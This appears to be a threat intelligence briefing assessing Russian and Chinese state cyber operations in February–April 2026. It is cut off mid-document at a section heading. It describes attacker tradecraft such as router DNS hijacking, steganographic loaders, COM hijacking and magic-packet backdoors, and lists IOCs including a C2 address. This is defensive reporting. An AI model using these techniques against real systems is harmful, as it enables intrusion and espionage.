CYBER THREAT INTELLIGENCE BRIEFING

Nation-State Threat Landscape Assessment Reporting Period: February 24 – April 10, 2026

PART 1: EXECUTIVE SUMMARY

1.1 Key Judgments

The following key judgments represent the highest-confidence, highest-impact findings across the full reporting period, with emphasis on developments from the April 3–10 delta window. All judgments are derived from open-source intelligence and assessed using ICD-203 analytical standards.

• The April 6 Hormuz deadline passed without a deal. Pakistan brokered a fragile two-week ceasefire on April 7–8, but Iran re-closed the Strait of Hormuz on April 8 citing Israeli strikes in Lebanon under Operation Eternal Darkness. The Strait remains effectively closed with approximately 15 ships per day transiting versus 135 pre-crisis. Over 800 tankers are stranded or waiting. The ceasefire is under immediate strain, with Iran’s parliamentary speaker declaring “time is running out” on April 9.

• A Six-Agency Joint Advisory was issued April 7 by the FBI, CISA, NSA, DOE, EPA, and U.S. Cyber Command confirming active Iranian exploitation of Rockwell Automation Allen-Bradley PLCs at U.S. water and wastewater, energy, and municipal facilities. Operational disruption at drinking water and wastewater systems was confirmed by EPA. Censys research identified 5,219 internet-exposed Rockwell PLCs globally, 74.6% in the United States.

• Operation Masquerade (April 7): An FBI-led multinational operation disrupted APT28/GRU’s FrostArmada DNS hijacking network. The campaign compromised over 18,000 unique IPs across 120+ countries and 200+ organizations using CVE-2023-50224 to exploit TP-Link and MikroTik routers. Seventeen partner nations participated in the largest coordinated Russian botnet disruption since Cyclops Blink in 2022.

• The Drift Protocol $286M cryptocurrency heist was attributed to DPRK’s UNC4736/Citrine Sleet on April 5. The attack involved a six-month social engineering operation in which North Korean operatives attended cryptocurrency conferences in person, deposited over $1M in real capital, and exploited Solana’s durable nonce mechanism to drain funds in 12 minutes.

• Storm-1175 rapid zero-day ransomware: Microsoft reported on April 7 that this Chinese-speaking group moves from initial access to Medusa ransomware deployment within 24 hours, exploiting 16+ CVEs across healthcare, education, and finance sectors in the U.S., UK, and Australia.

• The FBI DCS-3000 breach investigation continues. The system, which manages court-authorized surveillance operations, was breached via a commercial ISP vendor in a pattern consistent with Salt Typhoon. China may have gained visibility into which MSS operatives the FBI was actively tracking, with counterintelligence implications acute ahead of the Trump-Xi summit.

• Handala declared the cyber war “will not end with any military ceasefire.” The group temporarily paused U.S.-facing attacks following the ceasefire but pledged to continue operations against Israel and resume U.S. attacks “when conditions permit.” Cybersecurity experts predict a pivot to high-profile U.S. targets during the kinetic lull.

• BeiDou integration was publicly confirmed by Chinese Embassy science counsellor Zhang Heqing on April 8. Iran’s military transition to China’s BeiDou-3 satellite navigation eliminates U.S. ability to jam or degrade Iranian guidance systems, structurally ending U.S. GPS dominance in the Gulf theater.

• CISA faces an additional $707M FY2027 budget cut eliminating approximately 900 positions, announced April 7 — the same day as the six-agency ICS advisory. This compounds a pre-existing approximately 40% vacancy rate, reducing total CISA staffing to approximately 2,600 from a pre-2025 baseline of 3,700+.

• The Axios npm supply chain attack aftermath continues: 135 devices across approximately 12 organizations confirmed compromised. Secureworks CTU attributed the attack to NICKEL GLADSTONE. Transitive propagation through WordPress and Datadog packages confirmed, with months-long downstream assessment expected.

• Russia-Iran deep cyber collaboration: Ukrainian intelligence documented Z-Pentest Alliance and NoName057(16) coordinating with Iranian Handala on Israeli energy infrastructure attacks, including shared publication of access credentials to Israeli critical infrastructure control systems.

• Iran’s internet blackout reached Day 41 (960+ hours) on April 9 — the longest nationwide shutdown ever recorded in any country. The government has signaled this is a permanent policy shift, not a wartime measure.

1.3 Reporting Period Overview

This briefing covers the period from February 24 through April 10, 2026, encompassing the full arc of the U.S.-Israel-Iran kinetic conflict and its cyber dimensions. The period opened with Operation Epic Fury/Roaring Lion (February 28), which triggered the most active multi-actor cyber environment since Russia’s full-scale invasion of Ukraine. The reporting period closes in a post-deadline, fragile-ceasefire environment defined by confirmed ICS compromises at U.S. critical infrastructure facilities, an unprecedented six-agency joint advisory, and explicit declarations from Iranian-linked threat actors that cyber operations will continue regardless of military truces. The convergence of Russian, Chinese, North Korean, and Iranian cyber operations has deepened across every axis during this period, with confirmed military technology transfers, formalized information warfare agreements, and coordinated hacktivist operations against shared targets.

1.3a Conflict Timeline Summary

February 28, 2026: The United States and Israel launched Operation Epic Fury (U.S.) and Operation Roaring Lion (Israel), a coordinated military offensive targeting Iranian strategic leadership, IRGC and MOIS facilities, and nuclear infrastructure. Within hours, Iran’s internet connectivity collapsed to approximately 1% of pre-conflict levels as the government imposed a near-total blackout. Over 60 pro-Iranian hacktivist groups mobilized within the first 48 hours under the Electronic Operations Room coordination framework. The initial cyber response included the March 11 Stryker wiper attack—the first confirmed destructive cyber operation against a U.S. Fortune 500 company—which weaponized Microsoft Intune to erase 200,000+ devices across 79 countries without deploying traditional malware.

March 2–20, 2026: The cyber conflict expanded across all four nation-state threat actors. Russian hacktivist groups joined Iran’s cyber campaign under the #OpIsrael banner. Chinese APT operations intensified with Salt Typhoon still embedded in 200+ telecom companies globally and the BPFdoor kernel-level implants discovered deep in telecom backbone infrastructure. North Korean crypto theft operations continued at accelerated pace. The Strait of Hormuz was effectively closed to Western-aligned shipping from February 28, triggering a global energy supply crisis with Brent crude approaching $120/barrel.

March 20–April 3, 2026: The second phase saw escalating brinksmanship over Hormuz. Trump issued multiple deadlines for Iran to reopen the Strait, each extended as diplomatic channels remained active. Pakistan emerged as the primary mediator. Iranian cyber operations continued through external cells operating via Starlink despite the domestic blackout: Handala breached FBI Director Kash Patel’s personal email on March 27 (eight days after FBI domain seizures), the IRGC expanded its declared target list to 18 U.S. technology companies, and MuddyWater maintained persistent access to U.S. banking and aviation networks. The Axios npm supply chain attack (March 31, attributed to DPRK) and FBI DCS-3000 breach disclosure (April 1–2, attributed to China) compounded the multi-actor threat picture.

April 3–10, 2026 (Current Period): The Hormuz deadline passed on April 6 without agreement. Pakistan brokered a fragile two-week ceasefire on April 7–8, hours before U.S. bombers were reportedly airborne. The ceasefire was immediately strained by Israeli strikes in Lebanon and Iran’s reimposition of Hormuz tolls. The six-agency joint advisory (April 7) confirmed active Iranian exploitation of Rockwell PLCs at U.S. water and energy facilities. Handala declared the cyber war independent of any military ceasefire. Operation Masquerade disrupted APT28’s FrostArmada DNS hijacking network across 120+ countries. The Drift Protocol $286M heist was attributed to DPRK’s UNC4736. BeiDou integration was publicly confirmed by a Chinese state official. CISA’s $707M budget cut was announced on the same day as the ICS advisory.

1.4 Analytical Confidence and Methodology

This briefing employs the Intelligence Community Directive 203 (ICD-203) framework for expressing analytical confidence. Source reliability is assessed on a four-tier scale: Tier 1 (government primary sources, formal advisories, court documents), Tier 2 (established vendor research such as Mandiant, CrowdStrike, ESET, Trend Micro, Rapid7), Tier 3 (industry media, secondary analysis), and Tier 4 (social media, unverified claims). All key judgments are supported by Tier 1 or Tier 2 sources unless otherwise noted. Hacktivist claims are tracked but assessed as largely unverified unless independently corroborated. Analytical confidence levels (High, Moderate, Low) are applied to specific attributions and assessments throughout the document.

The analytical picture across all four nation-state threat actors has converged on a shared conclusion: the February 28–April 10, 2026 period represents a structural inflection in the global cyber threat environment, not a temporary escalation. Three factors drive this assessment. First, the Iran conflict has activated dormant capabilities and created new operational partnerships (Russia-Iran cyber coordination, China-Iran BeiDou integration) that will persist beyond any ceasefire. Second, DPRK crypto theft operations have reached industrial scale ($300M+ in Q1 2026 alone) with social engineering sophistication previously reserved for human intelligence operations. Third, the U.S. defensive posture is structurally degraded: CISA’s approximately 40% vacancy rate and proposed $707M budget cut create a detection and response gap that adversaries are actively exploiting. The convergence of these factors creates what the 2026 ODNI Annual Threat Assessment characterizes as the most complex multi-actor cyber environment in U.S. history.

Confidence levels vary across assessments in this briefing. Findings supported by U.S. government formal attribution, court documents, or joint multi-agency advisories are assessed at HIGH confidence. Vendor research findings from established firms (Mandiant, CrowdStrike, ESET, Trend Micro, Rapid7, Proofpoint) are assessed at MODERATE-HIGH confidence. Hacktivist claims and unverified breach assertions are tracked for situational awareness but assessed at LOW confidence unless independently corroborated. On-chain cryptocurrency attribution by Chainalysis, Elliptic, and TRM Labs is assessed at HIGH confidence for flow analysis and MODERATE confidence for specific threat actor linkage. Geopolitical assessments draw on ISW, AEI, CSIS, Atlantic Council, and Lawfare analyses assessed at MODERATE-HIGH confidence.

PART 2: NATION-STATE THREAT ASSESSMENTS

2.1 Russia

2.1.1 Strategic Overview

Russian cyber operations during the reporting period reflect a dual-front posture: the ongoing war in Ukraine (spring offensive stalled against Ukraine’s Fortress Belt) and deepening coordination with Iran’s cyber campaign against Israel and the United States. Russia’s spring 2026 offensive began approximately March 17–21 but has failed to breach Ukraine’s Fortress Belt fortifications in Donetsk Oblast. The cyber dimension integrates with kinetic operations through APT28’s PRISMEX targeting of Ukrainian defense supply chains and NATO logistics. Simultaneously, Ukrainian intelligence documented structured Russia-Iran cyber collaboration, with Russian hacktivist groups (Z-Pentest Alliance, NoName057(16), DDoSia Project) coordinating with Iranian threat actors on Israeli energy infrastructure attacks. Russia continues providing Iran with Geran-2 drones, satellite imagery, and real-time U.S. warship positioning data. The FSB database access law took effect April 1, formalizing warrantless access to any Russian organization’s databases. Approximately 60 pro-Russian hacktivist groups remain active on the Iran front.

2.1.2 Key Developments This Period

Operation Masquerade — APT28/GRU FrostArmada DNS Hijacking Disruption (April 7)

On April 7, 2026, the FBI announced a court-authorized disruption of a global DNS hijacking network operated by APT28 (GRU Military Unit 26165). The campaign, tracked as FrostArmada by Lumen Black Lotus Labs, exploited CVE-2023-50224 in TP-Link WR841N and MikroTik routers to steal credentials and overwrite DHCP/DNS settings. At peak activity in December 2025, 18,000+ unique IPs across 120+ countries communicated with APT28 infrastructure. Over 200 organizations were breached and 5,000+ consumer devices impacted, including routers in 23+ U.S. states. The operation employed adversary-in-the-middle (AitM) attacks against TLS-encrypted connections, harvesting plaintext passwords, OAuth tokens, and email content. The FBI executed commands to compromised U.S. routers to collect forensic evidence, restore legitimate DNS settings, and revoke APT28 access. Seventeen partner nations participated, including the UK, Germany, Italy, Finland, Canada, and Ukraine.

APT28 PRISMEX Framework — Full Technical Disclosure (April 8)

Trend Micro published comprehensive technical disclosure of APT28’s PRISMEX malware suite on April 8. Active since September 2025 with significant escalation in January 2026, PRISMEX targets Ukrainian defense ministries (40%), transportation and logistics (35%), and diplomatic entities (25%), extending to Poland rail logistics, Romanian maritime transport, and other NATO partner logistics networks. The framework exploits two CVEs: CVE-2026-21509 (Microsoft Office OLE bypass) and CVE-2026-21513 (MSHTML zero-day, CVSS 8.8). Components include PrismexSheet (Excel dropper with steganography), PrismexDrop (native dropper with COM hijacking), PrismexLoader (proxy DLL extracting payloads from PNG images), and PrismexStager (Covenant Grunt implant using Filen.io cloud C2). A wiper command deleting files under %USERPROFILE% was observed in at least one session.

UAC-0255/CYBER SERP AGEWHEEZE RAT Campaign

Between March 26–28, attackers impersonated CERT-UA in phishing emails directing recipients to download AGEWHEEZE, a Go-based RAT with full remote access capabilities including screenshots, keyboard/mouse emulation, file system management, and terminal command execution. The C2 server at 54.36.237.92 (OVH) used WebSocket connections on port 8443. The attack was assessed as largely unsuccessful, with only a small number of personal devices at educational institutions infected.

Russia-Iran Cyber Coordination

A Ukrainian intelligence assessment reviewed by Reuters on April 7 documented structured Russia-Iran cyber collaboration. Russian hacktivist groups (Z-Pentest Alliance, NoName057(16), DDoSia Project) coordinated with Iranian actors (Handala, Homeland Justice/UAC-0074, Karmabelow80) via Telegram. Specific coordination included simultaneous publication of Israeli energy infrastructure access credentials by Russian groups while Iranian groups issued attack warnings. Iranian groups were found using ProfitServer, a Russian VPS provider based in Chelyabinsk, for domain registration.

Additional Key Developments

• Rostelecom DDoS (April 6): A large-scale DDoS attack disrupted Russia’s state-run telecom across 30 cities affecting millions of users, coinciding with the Hormuz deadline.

• CARR Trial (April 7): Victoria Dubranova’s trial in the Cyber Army of Russia Reborn (CARR) case commenced in the Central District of California, with charges carrying a maximum 27-year sentence.

• FSB Database Access Law (April 1): Russian law granting FSB warrantless access to any organization’s databases entered force.

• FBI/CISA PSA (March 20): Formal attribution of Signal/WhatsApp account compromise campaign to Russian Intelligence Services, with thousands of accounts compromised globally.

• ESET BEARDSHELL/SLIMAGENT: Full technical disclosure of APT28 long-term Ukraine espionage using dual-cloud C2 (Icedrive and Filen.io).

• ClearSky BadPaw/MeowMeow: New Russian malware family targeting Ukraine with sophisticated anti-analysis measures.

• DOJ TA551 Sentencing (March 24): Ilya Angelov sentenced to 24 months for co-managing the TA551 botnet responsible for $14.17M in ransomware extortion.

• Sandworm/APT44 continued ICS/OT targeting of Ukrainian and European energy infrastructure.

• Midnight Blizzard RDP phishing campaign ongoing from late 2024.

2.1.2a Detailed Campaign Analysis

Operation Masquerade — Technical Deep Dive

The FrostArmada infrastructure operated through a two-cluster architecture. Cluster 1 comprised SOHO routers with DNS/DHCP settings overwritten to route victim traffic through actor-controlled VPS DNS servers, enabling adversary-in-the-middle interception. Cluster 2 consisted of a subset of servers receiving DNS queries via compromised MikroTik and TP-Link routers, forwarding to additional actor-owned servers, and facilitating direct interactive operations against Ukrainian MikroTik infrastructure. The exploitation vector leveraged CVE-2023-50224 (CVSS 6.5), an authentication bypass in TP-Link WR841N firmware that allowed credential extraction via crafted HTTP GET requests. A second crafted GET request overwrote DHCP/DNS settings, replacing legitimate resolvers with actor-controlled servers. All downstream devices including laptops, phones, and IoT devices inherited malicious DNS settings automatically. For high-value targets, the infrastructure served fraudulent DNS records mimicking legitimate services, particularly Microsoft Outlook Web Access, enabling credential harvesting at scale. The FBI executed a court-authorized technical operation from the Eastern District of Pennsylvania, sending commands to compromised U.S. routers to collect forensic evidence, reset DNS settings to legitimate ISP resolvers, and revoke the original APT28 access mechanism. The operation was led by FBI Boston SAC Ted E. Docks with coordination across 17 partner nations. Germany’s BfV had been contacting affected router operators since March 13, 2026, having identified at least 30 compromised routers in the country. Private sector contributors included Lumen Black Lotus Labs (which named the campaign FrostArmada), Microsoft Threat Intelligence, and MIT Lincoln Laboratory.

PRISMEX Framework — Component Architecture

The PRISMEX campaign represents APT28’s most technically sophisticated modular malware suite disclosed to date. PrismexSheet operates as the initial dropper using macro-enabled Excel files with custom “Bit Plane Round Robin” steganography to embed payloads within seemingly benign image files. The component performs COM hijacking on CLSID {68DDBB56-9D1D-4FD9-89C5-C0DA2A625392} for persistence, using decoy documents themed as drone inventory lists, weapon smuggling alerts, and military training invitations. PrismexDrop functions as a native dropper that decrypts payloads with rolling XOR and performs COM DLL hijacking on CLSID {D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}, establishing a scheduled task named “OneDriveHealth” to restart explorer.exe as a trusted process. PrismexLoader masquerades as EhStorShell.dll and extracts .NET payloads from PNG images using the Bit Plane Round Robin algorithm, achieving fully fileless in-memory execution through CLR bootstrapping in explorer.exe. PrismexStager implements a Covenant Grunt implant that routes C2 communications through Filen.io end-to-end encrypted cloud storage (gateway.filen.io, egest.filen.io, ingest.filen.io), blending malicious traffic with legitimate encrypted cloud traffic to bypass reputation-based filtering. The campaign targets Ukraine defense ministries (40% of targets), transportation and logistics (35%), and diplomatic entities (25%), with extension to Poland (rail logistics), Romania (maritime/transport), Slovakia, Slovenia, and Turkey.

Signal/WhatsApp Campaign — Global Scope

The FBI/CISA joint PSA issued March 20 represents the highest-tier U.S. government confirmation of the messaging app compromise campaign. The PSA confirmed thousands of individual accounts worldwide compromised through social engineering rather than encryption bypass. Actors posed as “Signal Support” bots to steal device-linking QR codes or account verification PINs, enabling full account access including historical message content. FBI Director Kash Patel stated the campaign targets “individuals of high intelligence value, including current and former U.S. government officials, military personnel, political figures, and journalists.” France (ANSSI/C4), Netherlands (AIVD/MIVD), and Germany issued parallel warnings, establishing a four-country confirmed targeting footprint across core EU/NATO states. Prior independent attribution by Microsoft and Google GTIG linked the campaign to Star Blizzard (FSB), UNC5792/UAC-0195 (assessed GRU-linked), and UNC4221/UAC-0185 (assessed GRU-linked). The PSA warned that malware deployment may be added to the attack chain as the campaign evolves.

Russian Domestic Cyber Policy

Russia’s domestic information environment hardening accelerated during the reporting period. The FSB database access law entered force April 1, granting the FSB legal authority to obtain copies of any organization’s databases without court order. Putin signed a law on February 20 giving FSB power to order ISPs to restrict internet access without judicial authorization. The Kremlin is setting conditions to imminently tighten VPN restrictions per ISW’s April 2 assessment. These measures create a dual posture: reducing Russian military communications exposure while simultaneously conducting offensive operations abroad. The convergence of domestic internet controls with the spring 2026 kinetic offensive suggests a war-footing digital posture consistent with New Generation Warfare doctrine.

2.1.3 Tactics, Techniques, and Procedures

Russian APT TTPs during this period reflect increasing sophistication in infrastructure abuse and evasion. Key patterns include: exploitation of SOHO router firmware vulnerabilities for DNS hijacking at scale (CVE-2023-50224); dual CVE chaining for zero-day exploitation (CVE-2026-21509 + CVE-2026-21513); legitimate cloud storage abuse for C2 (Filen.io, Icedrive); steganographic payload delivery via PNG images; COM object hijacking for persistence; adversary-in-the-middle attacks against TLS-encrypted traffic; and coordinated hacktivist DDoS operations under the #OpIsrael banner. The PRISMEX framework demonstrates APT28’s evolution toward modular, fileless, cloud-native malware architecture that bypasses reputation-based filtering.

2.1.5 Assessment and Outlook

Russia’s cyber threat posture remains HIGH with an upward trajectory driven by the dual Ukraine/Iran fronts. Operation Masquerade’s disruption is tactically significant but historically GRU units reconstitute rapidly. The PRISMEX framework represents APT28’s most sophisticated modular toolset disclosed to date, with destructive wiper capability embedded alongside espionage functions. The Russia-Iran cyber axis is now documented at the coordination level, with shared infrastructure and synchronized targeting. The spring offensive’s stall may redirect Russian cyber assets toward asymmetric pressure via the Iran theater. Near-term priorities include monitoring for FrostArmada reconstitution, PRISMEX expansion to additional NATO targets, and deepening Russia-Iran hacktivist coordination during the ceasefire period.

Pro-Russian Hacktivist Group Inventory

The pro-Russian hacktivist ecosystem supporting Iranian operations represents the most geographically diverse proxy alignment in modern cyber conflict. NoName057(16) operates the DDoSia Project, a crowdsourced DDoS platform that provides subscribers with automated attack tools targeting Israeli municipal, political, telecom, and defense-related entities. The group maintains active Telegram channels for coordination and has been linked to the CISM, an IT organization established by Russian Presidential order in October 2018. Cardinal, a state-aligned hacktivist group, jointly claimed attacks on Israeli military systems including alleged Iron Dome radar and interception infrastructure breaches—claims assessed as highly exaggerated by Intel 471 and Trellix but consistent with psychological warfare objectives. Russian Legion claimed control of Iron Dome radars and interception targets in real-time, assertions assessed as highly improbable. Z-Pentest Alliance alleged full control of Israeli pump control and water supply management HMIs—consistent with prior claims patterns but unverified. Hider_Nex claimed disruption of Israeli telecommunications. RuskiNet Group claimed temporary disruption of KPMG Israel. PalachPro publicly stated intent to assist Iranian hackers. Dark Storm Team claimed DDoS against Israeli banks. Server Killers (Russian-speaking) joined the cyber war in an opportunistic capacity. Resecurity assessed the overall hacktivist activity as “uncoordinated and conducted by multiple disconnected groups” despite Kremlin messaging suggesting Russia-Iran alignment, though the April 7 Ukrainian intelligence assessment suggests greater coordination than previously assessed.

Midnight Blizzard (APT29/SVR) — Continued RDP Phishing

APT29/Midnight Blizzard/Cozy Bear, attributed to Russia’s SVR, maintained its ongoing RDP phishing campaign throughout the reporting period. Originally disclosed in late 2024, the campaign uses signed RDP configuration files sent via phishing emails to establish persistent connections to target systems. While no new campaign disclosures emerged during the April 3–10 window, the campaign from late 2024 is assessed as ongoing against government, diplomatic, and think tank targets across NATO member states. The Microsoft breach lateral movement investigation continues, with the SVR maintaining access to Microsoft’s source code repositories and corporate email systems for an extended period before discovery. APT29’s operational tempo is sustained but receives less public attention than APT28 due to the latter’s more aggressive tooling and targeting.

Sandworm/APT44 — ICS/OT and Wiper Operations

Sandworm (APT44, GRU Unit 74455) continues its ICS/OT targeting of Ukrainian and European energy infrastructure, though no new Sandworm campaigns were publicly disclosed in the April 3–10 window. The group’s most recent publicly documented operations include the ZeroLot wiper deployed against Ukrainian energy companies in 2024–2025 and the December 29, 2025 FSB Center 16 attack on 30 Polish renewable energy facilities using the Dynowiper malware (descended from Sandworm’s ZOV tool). The Barracuda Networks March 16 profile confirmed Sandworm’s operational continuity through January 2026 targeting campaigns. The BadPilot campaign (Seashell Blizzard subgroup) continues providing initial access for Sandworm operations. RUSI hosted John Hultquist (Google Threat Intelligence Chief Analyst) for a March 2026 event specifically on Russian cyber sabotage in Europe, signaling heightened analyst attention. The convergence of Sandworm’s European energy targeting with Russia’s spring offensive creates elevated risk for coordinated cyber-kinetic operations against Ukrainian logistics and Western energy infrastructure supporting Ukraine.

2.2 China

2.2.1 Strategic Overview

Chinese cyber operations during this period are characterized by an unprecedented combination of intelligence collection depth and structural strategic positioning. The FBI DCS-3000 surveillance system breach represents the most operationally significant Chinese penetration of U.S. law enforcement infrastructure ever publicly disclosed. The pre-summit espionage window ahead of the Trump-Xi Beijing meeting is active, with Salt Typhoon still embedded in 200+ companies globally. CISA’s structural degradation (40% vacancy rate plus proposed $707M FY2027 cut) creates a widening detection gap. BeiDou integration with Iran was publicly confirmed at the state level, structurally ending U.S. GPS dominance in the Gulf theater. The Trump administration halted Salt Typhoon sanctions to preserve the trade truce, effectively signaling to the MSS that telecom espionage will not generate diplomatic costs.

2.2.2 Key Developments

• FBI DCS-3000 Breach: Classified as a FISMA “major incident” on April 1. The Digital Collection System Network manages court-authorized surveillance operations. Attackers exploited commercial ISP vendor infrastructure in a pattern consistent with Salt Typhoon. Congress notified. Investigation ongoing.

• Storm-1175 Rapid Zero-Day Ransomware (April 7): Microsoft reported this Chinese-speaking group moves from initial access to Medusa ransomware deployment within 24 hours, exploiting 16+ CVEs across Ivanti, JetBrains, SimpleHelp, CrushFTP, BeyondTrust, and SmarterMail products. Targets include healthcare, education, and finance sectors.

• FlamingChina/NSCC Tianjin Breach (April 7–9): A group calling itself FlamingChina claimed theft of 10+ petabytes from China’s National Supercomputing Center in Tianjin, including defense and aerospace research data. Expert assessment: samples appear genuine. This is of Chinese systems, not by China.

• TA416/Mustang Panda resumed European and Middle East espionage (April 1): Proofpoint documented renewed targeting of EU and NATO diplomatic missions with three evolving infection chains deploying custom PlugX backdoor via DLL sideloading. Middle East expansion from March 2026.

• BPFdoor/Red Menshen: RH-ISAC published IOCs on March 31 for kernel-level Linux implants deployed deep inside telecom backbone infrastructure. Seven new variants identified with SCTP signaling and HTTPS camouflage capabilities.

• BeiDou-3 integration publicly confirmed by Chinese Embassy science counsellor Zhang Heqing on April 8. Military-tier B3A signal provides sub-5-meter accuracy with jam-resistant frequency hopping.

• Trump administration halted Salt Typhoon sanctions to preserve trade truce ahead of the Beijing summit.

• CVE-2026-35616 (Fortinet FortiClient, April 6) and CVE-2026-1340 (Ivanti EPMM, April 8) added to CISA KEV catalog with high Chinese APT exploitation relevance.

• FCC router ban (March 23) explicitly cited Volt, Flax, and Salt Typhoon as justification.

• EU sanctions on Integrity Tech (Flax Typhoon) and i-Soon (March 16) represent most significant expansion of EU cyber sanctions since 2019.

• PLA Cyberspace Force deployment to Fiery Cross Reef in the South China Sea confirmed, signaling offshore cyber warfare capabilities.

• Salt Typhoon remains embedded in 200+ companies across 80+ countries. AT&T and Verizon have not confirmed full eviction.

• Volt Typhoon pre-positioning in U.S. critical infrastructure continues, with CISA supplementary advisory noting intensified activity since mid-2025.

• GoLaxy cognitive warfare database compiled files on 170 Taiwanese politicians and 23 million household registration records.

• Taiwan under sustained attack: 2.63 million cyberattacks per day in 2025, correlated with PLA military exercises.

2.2.2a Detailed Campaign Analysis

FBI DCS-3000 Breach — Counterintelligence Analysis

The penetration of the FBI’s Digital Collection System Network (DCS-3000, internally known as “Red Hook”) represents the most operationally significant Chinese cyber operation disclosed during the reporting period. First detected February 17, 2026, the breach targeted an unclassified system that manages court-authorized surveillance operations including FISA warrants, pen register data, and trap-and-trace device returns. The system captures call metadata—who called whom, when, from where, and websites visited by devices under surveillance—but not call content. The intelligence value to China is profound: knowledge of who the FBI is actively watching can expose undercover assets, tip off PRC operatives under surveillance, and reveal the identities of human intelligence sources developed inside Chinese networks. The attack exploited commercial ISP vendor infrastructure in a supply chain pivot consistent with Salt Typhoon’s established playbook for CALEA infrastructure exploitation. The breach involved FBI systems in the U.S. Virgin Islands rather than FBI headquarters. No formal public attribution has been issued, though methods closely match Salt Typhoon TTPs. Democratic lawmakers have previously warned that telecoms never fully evicted Salt Typhoon, suggesting this may represent a continuation or parallel access path. The timing—approximately six weeks before the scheduled Trump-Xi summit—has significant counterintelligence and diplomatic implications: an adversary with visibility into active FBI surveillance can identify what intelligence the U.S. has on PRC officials participating in summit preparations.

BPFdoor/Red Menshen — Deep Infrastructure Penetration

The BPFdoor campaign disclosed by Rapid7 represents a qualitatively different threat from previous Chinese telecom intrusions. While Salt Typhoon targeted the IT layer (call records, lawful intercept systems), Red Menshen operates at the kernel level, deploying BPF-based implants inside the signaling core of telecom backbone infrastructure. BPFdoor does not open ports, does not beacon home, and does not appear in netstat or standard monitoring tools. It remains completely dormant until activated by a specifically crafted “magic packet.” New variants disclosed by Rapid7 include HTTPS-embedded activation using a “magic ruler” technique that ensures the command marker lands at the 26th byte offset, surviving TLS termination and reverse proxies. SCTP signaling filters target 4G and 5G core networks, enabling passive surveillance of mobile subscriber identity and authentication exchanges. ICMP tunneling provides lateral movement between compromised hosts. Process masquerading mimics HPE ProLiant hardware management daemons and Docker container process names in Kubernetes pods. The RH-ISAC published specific SHA256 hashes for multiple BPFdoor variants and controllers on March 31, providing actionable intelligence for threat hunting. F5 Labs identified seven new variants (F through L) with two primary subtypes: httpShell and icmpShell. Source code leaked publicly in 2022 has not spread to commodity threat actors—operational complexity keeps it exclusively in nation-state hands.

Salt Typhoon — Persistent Global Scope

Salt Typhoon remains the most geographically dispersed Chinese APT campaign on record with confirmed victims in 200+ companies across 80+ countries according to FBI figures. Confirmed victims include AT&T, Verizon, T-Mobile, Lumen/CenturyLink, Spectrum/Charter, Windstream, Consolidated Communications, and Viasat. U.S. state National Guard networks were compromised, providing access to networks in every other U.S. state and several territories. International reach extends to Canada, UK (Downing Street phone records from 2021–2024), Norway, Netherlands, Italy, Finland, Poland, Argentina, Mexico, Brazil, Myanmar, South Africa, Bangladesh, Indonesia, Malaysia, Thailand, Australia, New Zealand, India, Taiwan, Philippines, and Japan. The Trump administration halted a package of sanctions against China over the Salt Typhoon breach to avoid jeopardizing the Beijing summit and trade negotiations—effectively removing diplomatic deterrence during the highest-risk collection period.

Volt Typhoon Pre-Positioning

CISA issued a supplementary advisory in February 2026 noting Volt Typhoon activity had intensified since mid-2025 with new indicators of compromise in the water and communications sectors. IISS characterized this as having shifted from espionage to pre-positioning for disruptive operations against U.S. critical infrastructure in a Taiwan contingency, describing it as redrawing “the boundary for acceptable state behavior in cyberspace.” Key targets include Guam port and air base networks, electric utilities, water treatment SCADA/ICS, oil and gas pipelines, satellite communications, and military logistics contractors. Volt Typhoon employs Living-off-the-Land tradecraft using native Windows tools (wmic, netsh, ntdsutil, PowerShell) with SOHO router botnets for traffic obfuscation. The campaign represents the most sustained pre-positioning operation against U.S. critical infrastructure by a foreign adversary ever documented.

Taiwan Sustained Cyber Pressure

Taiwan’s National Security Bureau annual report (January 2026) documented Chinese cyberattacks averaging 2.63 million per day against Taiwan critical infrastructure in 2025, a 6% increase year-over-year and 113% increase from 2023 baseline. Attacks correlated with 23 of 40 PLA joint combat readiness patrols, confirming hybrid threat doctrine. The GoLaxy database compiled by a PRC state-affiliated firm contains files on 170 Taiwanese politicians, 23 million household registration records (Taiwan’s entire population), and databases of U.S. political figures, designed to power a smart propaganda system using AI bots. The top five Chinese hacker groups against Taiwan are BlackTech, Flax Typhoon, Mustang Panda, APT41, and UNC3886.

PLA Cyberspace Force — Structural Assessment

The PLA Cyberspace Force, established April 19, 2024 following the dissolution of the Strategic Support Force’s Network Systems Department, represents China’s most significant military cyber reorganization in a decade. Commanded by Zhang Minghua with Han Xiaodong as political commissar, the force operates five Technical Reconnaissance Bases aligned with PLA’s five theater commands and a Cyberspace Operations Base overseeing offensive cyberwarfare, psychological warfare, and advanced cybersecurity research. Xi Jinping’s February 12, 2026 Lunar New Year video message revealed for the first time a PLA Cyberspace Force unit stationed on Fiery Cross Reef (Yongshu Jiao) in the disputed Spratly Islands, conducting “combat readiness duty.” This deployment places Chinese state cyber operators in closer physical proximity to undersea cable infrastructure, regional telecommunications nodes, and military networks of U.S. allies including the Philippines, Vietnam, Malaysia, and Indonesia. The force made its first public appearance at the China Victory Day Parade on September 3, 2025.

GoLaxy Cognitive Warfare Database

Leaked documents from PRC state-affiliated firm GoLaxy, analyzed by Doublethink Lab (published March 4, 2026, based on August 2025 leaked documents), reveal a comprehensive cognitive warfare infrastructure targeting Taiwan. The GoLaxy database compiled files on 170 Taiwanese politicians (including President Lai), all 23 million Taiwanese household registration records, academics, business figures, and religious leaders. The database enabled AI/ML-driven targeting, ideological classification (including “attitude toward China”), and weekly public opinion reports. GoLaxy sought funding and guidance from the Cyberspace Administration of China, Central Propaganda Department, and Ministry of State Security. The system was designed to power a “smart propaganda system” using AI bots for targeted propaganda operations. This represents active cognitive warfare infrastructure targeting Taiwan ahead of upcoming elections and constitutes the most comprehensive publicly documented foreign influence database ever disclosed.

China’s Amended Cybersecurity Law

China’s amended Cybersecurity Law, effective January 1, 2026, introduced provisions with direct implications for the global cyber threat landscape. Mandatory vulnerability disclosure to the Ministry of State Security within 48 hours gives the MSS a head start on zero-days before vendors are notified—a structural advantage for Chinese offensive cyber operations. Extraterritorial enforcement provisions target any person or organization globally whose actions “endanger China’s cybersecurity,” creating legal cover for retaliatory actions against foreign security researchers. Significantly increased fines (up to RMB 10 million for serious violations) and a new prohibition on unauthorized public vulnerability releases further consolidate state control over the vulnerability ecosystem.

Trump Administration Cyber Strategy — China Omission

